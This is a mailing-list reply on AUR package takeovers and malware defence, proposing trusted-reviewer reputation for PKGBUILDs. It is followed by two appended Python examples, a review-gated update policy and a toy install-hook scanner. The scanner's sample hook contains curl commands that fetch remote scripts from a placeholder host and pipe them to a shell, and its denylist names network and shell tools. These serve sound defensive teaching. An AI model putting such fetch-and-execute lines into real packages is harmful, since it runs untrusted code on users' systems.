On 5/28/26 2:32 AM, [email protected] wrote:
> I'm against giving up my name and stuff too just to maintain AUR packages, and
> if I'm forced to, I'll just disown or not update anything I maintain.
> In the past, I have adopted some packages I saw were orphaned and I use myself,
> not because I wanted to maintain them, but because I wanted to prevent someone else
> from taking them over to spread malware.
> How did I find out they were orphaned? My AUR helper listed them as orphaned.
> So here are my solutions:
> 1. Improve moderation tools
> If subreddits can moderate better, and delete posts in under a minute, we can
> too.
> Improve the UI, make it easy to spot suspicious changes, etc. I really don't wanna
> be specific, as I am not a Reddit mod,
> but having a global moderation queue where accounts registered for a long time
> can flag something could be a good start.
> 2. Have AUR helpers actually cooperate
> What I mean by this is, have them print a red warning that a maintainer has
> changed or if a package was recently adopted.
> Also have them print out a red warning if a user tries to update a package that
> was previously spreading malware,
> like "This package was previously taken over. If you installed that version, secure
> your machine".
> Have this be the default. No one is gonna dig through AUR helper man pages to
> find if this exists.
> This of course would require some improvements to the aurweb RPC interface, but so be
> it.
I think a reputation system for PKGBUILDs would be highly effective. Currently
only known-bad findings are reported, but known-good findings are not recorded
anywhere.
You could define a set of individuals you consider trustworthy and capable
reviewers, then only accept PKGBUILDs onto your system that have positive
reviews from N of those people.
This kind of system already exists in the Rust ecosystem:
https://github.com/crev-dev/cargo-crev
There's also a toy project that parses the install hook into an AST and flags
things you should probably look into, but it's fairly noisy because it flags
every unrecognized command as suspicious:
https://github.com/kpcyrd/smelly-hooks
It would've flagged and pointed out the npm install in browsh-bin, yet you
should probably not rely on this for security since "we didn't forget any shell
scripting edge-case" is likely not something you want to gamble your computer
integrity on.
cheers,
kpcyrd
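Added example, not code from either message above nor from any AUR helper or from cargo-crev: a policy gate an AUR helper could run before applying an update, combining the quoted suggestion (warn on a maintainer change or a fresh adoption, warn on a package known to have been taken over) with the N-of-trusted-reviewers acceptance rule for PKGBUILDs. It assumes the aurweb RPC v5 "info" result shape for the "Name" and "Maintainer" fields (Maintainer is null for orphans); the local install snapshot, the review store keyed by PKGBUILD sha256, the taken-over list and all reviewer and package names are constructed for the example. Because the RPC exposes no adoption history, maintainer changes are detected by comparing against what was recorded locally at the last install.

```python
import hashlib

# Constructed policy for this example. Reviewer and package names are placeholders,
# not real AUR accounts or packages.
TRUSTED_REVIEWERS = {"alice", "bob", "carol"}
REQUIRED_POSITIVE = 2                    # accept a PKGBUILD only with this many trusted "good" reviews
KNOWN_TAKEN_OVER = {"examplepkg-bin"}    # hypothetical: stands in for a curated list of past takeovers


def pkgbuild_digest(pkgbuild_text):
    """Reviews are keyed by the exact PKGBUILD bytes, so any edit invalidates earlier reviews."""
    return hashlib.sha256(pkgbuild_text.encode("utf-8")).hexdigest()


def trusted_verdicts(digest, reviews):
    """Return (good, bad): sets of trusted reviewers who reviewed this digest.

    reviews is an iterable of {"reviewer", "digest", "verdict"} records (a hypothetical
    store, loosely modelled on crev proofs). Reviews by untrusted accounts are ignored,
    as are reviews of other PKGBUILD versions."""
    good, bad = set(), set()
    for r in reviews:
        if r["digest"] != digest or r["reviewer"] not in TRUSTED_REVIEWERS:
            continue
        (good if r["verdict"] == "good" else bad).add(r["reviewer"])
    return good, bad


def evaluate_update(info, snapshot, pkgbuild_text, reviews):
    """Decide whether an AUR helper should apply an update and what to warn about.

    info:     one result entry from the aurweb RPC v5 "info" call; only "Name" and
              "Maintainer" are used (Maintainer is null/None for orphaned packages).
    snapshot: {pkgname: {"maintainer": str | None}} recorded locally at the last
              install. The RPC exposes no adoption history, so maintainer changes and
              adoptions are detected by comparing against this local record.
    Returns (decision, warnings) with decision in {"accept", "warn", "reject"}."""
    name, maintainer = info["Name"], info.get("Maintainer")
    warnings = []

    if name in KNOWN_TAKEN_OVER:
        warnings.append(f"{name}: this package was previously taken over. "
                        "If you installed that version, secure your machine.")

    prev = snapshot.get(name)
    if prev is not None and prev["maintainer"] != maintainer:
        if prev["maintainer"] is None:
            warnings.append(f"{name}: was orphaned at last install, since adopted by {maintainer}")
        elif maintainer is None:
            warnings.append(f"{name}: is now orphaned (was maintained by {prev['maintainer']})")
        else:
            warnings.append(f"{name}: maintainer changed from {prev['maintainer']} to {maintainer}")

    good, bad = trusted_verdicts(pkgbuild_digest(pkgbuild_text), reviews)
    if bad:
        decision = "reject"                  # one trusted negative review vetoes the update
        warnings.append(f"{name}: negative review from trusted reviewer(s) {sorted(bad)}")
    elif len(good) >= REQUIRED_POSITIVE:
        decision = "accept"
    else:
        decision = "warn"                    # not known-bad, but not known-good either
        warnings.append(f"{name}: only {len(good)}/{REQUIRED_POSITIVE} trusted positive "
                        "reviews for this exact PKGBUILD")
    return decision, warnings


if __name__ == "__main__":
    # Constructed scenario: an orphan that was adopted, whose new PKGBUILD no trusted reviewer has seen.
    pkgbuild = "pkgname=examplepkg-bin\npkgver=2.0\n"
    info = {"Name": "examplepkg-bin", "Maintainer": "newuser"}
    snapshot = {"examplepkg-bin": {"maintainer": None}}
    reviews = [{"reviewer": "mallory", "digest": pkgbuild_digest(pkgbuild), "verdict": "good"}]
    decision, warnings = evaluate_update(info, snapshot, pkgbuild, reviews)
    print(decision)
    for w in warnings:
        print("WARNING:", w)
```

The warnings are emitted regardless of the decision, so a helper would print them in red even when the PKGBUILD is accepted; the snapshot should be updated with the new maintainer only after the user goes ahead, otherwise the next run silently forgets the change.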
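Added example, not the smelly-hooks code nor anything from the thread: a toy install-hook scanner in the spirit of the one mentioned above, tokenising each line of a .install file with shlex and classifying every word in command position against a small constructed allowlist and denylist. The sample hook is constructed; the URL host is a placeholder. It reproduces both properties discussed: it flags an `npm install` (and an unquoted command substitution), it is noisy because every unrecognised command is reported, and it misses a command substitution hidden inside double quotes, which is the kind of shell edge case you should not bet your machine's integrity on. Heredoc bodies and backslash line continuations are likewise outside what this line-oriented scan handles.

```python
import shlex

# Constructed lists for this example; a real scanner would want a far larger allowlist.
ALLOWED = {"systemctl", "echo", "printf", "cat", "ln", "rm", "mkdir", "chmod", "chown",
           "getent", "groupadd", "useradd", "usermod", "ldconfig", "setcap", "true",
           "update-desktop-database", "gtk-update-icon-cache", "xdg-icon-resource"}
DENIED = {"curl", "wget", "npm", "pip", "pip3", "eval", "base64", "nc", "sh", "bash",
          "python", "python3"}
KEYWORDS = {"if", "then", "else", "elif", "fi", "while", "until", "do", "done", "!", "time"}


def _starts_command(tok):
    """True if the token after this one is in command position: list operators,
    group/subshell openers, backticks and shell keywords."""
    return tok in KEYWORDS or (bool(tok) and tok[-1] in "(;|&{}`")


def scan_hook(text):
    """Line-oriented scan of a .install hook; returns findings as dicts.

    Each line is tokenised with shlex (punctuation_chars=True splits ';', '|', '&&', '(' ...)
    and every token in command position is classified. Function definitions are recorded
    so that calling them later in the file is not reported. Anything inside quotes is a
    single token to shlex, so a quoted "$(...)" is invisible to this scan."""
    findings, defined = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        try:
            toks = list(shlex.shlex(line, posix=True, punctuation_chars=True))
        except ValueError as err:            # e.g. unterminated quote: report rather than skip
            findings.append({"line": lineno, "cmd": None, "severity": "error", "reason": str(err)})
            continue
        cmd_pos, i = True, 0
        while i < len(toks):
            tok = toks[i]
            nxt = toks[i + 1] if i + 1 < len(toks) else ""
            if _starts_command(tok):
                cmd_pos = True
            elif cmd_pos:
                if nxt == "()" or (nxt == "(" and toks[i + 2:i + 3] == [")"]):
                    defined.add(tok)         # "name() {" is a definition, not a call
                    i += 2 if nxt == "()" else 3
                    continue
                if "=" in tok and tok.split("=", 1)[0].isidentifier():
                    i += 1                   # leading VAR=value assignment; the command still follows
                    continue
                cmd_pos = False
                if tok == "$":
                    if nxt != "(":           # "$(" is a substitution; "(" puts the next token in command position
                        findings.append({"line": lineno, "cmd": "$" + nxt, "severity": "high",
                                         "reason": "command name comes from a variable; cannot be resolved statically"})
                elif tok in DENIED:
                    findings.append({"line": lineno, "cmd": tok, "severity": "high",
                                     "reason": "network, package manager or interpreter invoked from a hook"})
                elif tok not in ALLOWED and tok not in defined:
                    findings.append({"line": lineno, "cmd": tok, "severity": "low",
                                     "reason": "unrecognized command"})
            i += 1
    return findings


# Constructed sample hook. Line 6 deliberately hides the download inside double quotes.
SAMPLE_HOOK = """\
post_install() {
  getent group example >/dev/null || groupadd -r example
  systemctl daemon-reload
  cd /opt/example && npm install --production
  source <(curl -s https://example.invalid/setup.sh)
  echo "$(curl -s https://example.invalid/x.sh | sh)"
}
post_upgrade() {
  post_install
}
"""

if __name__ == "__main__":
    for f in scan_hook(SAMPLE_HOOK):
        print(f"line {f['line']}: [{f['severity']}] {f['cmd']}: {f['reason']}")
```

Running it on the sample reports `npm` and the `curl` behind `<(` as high, `cd` and `source` as low-severity noise, and nothing at all for line 6, which is exactly the gap the caveat above is about.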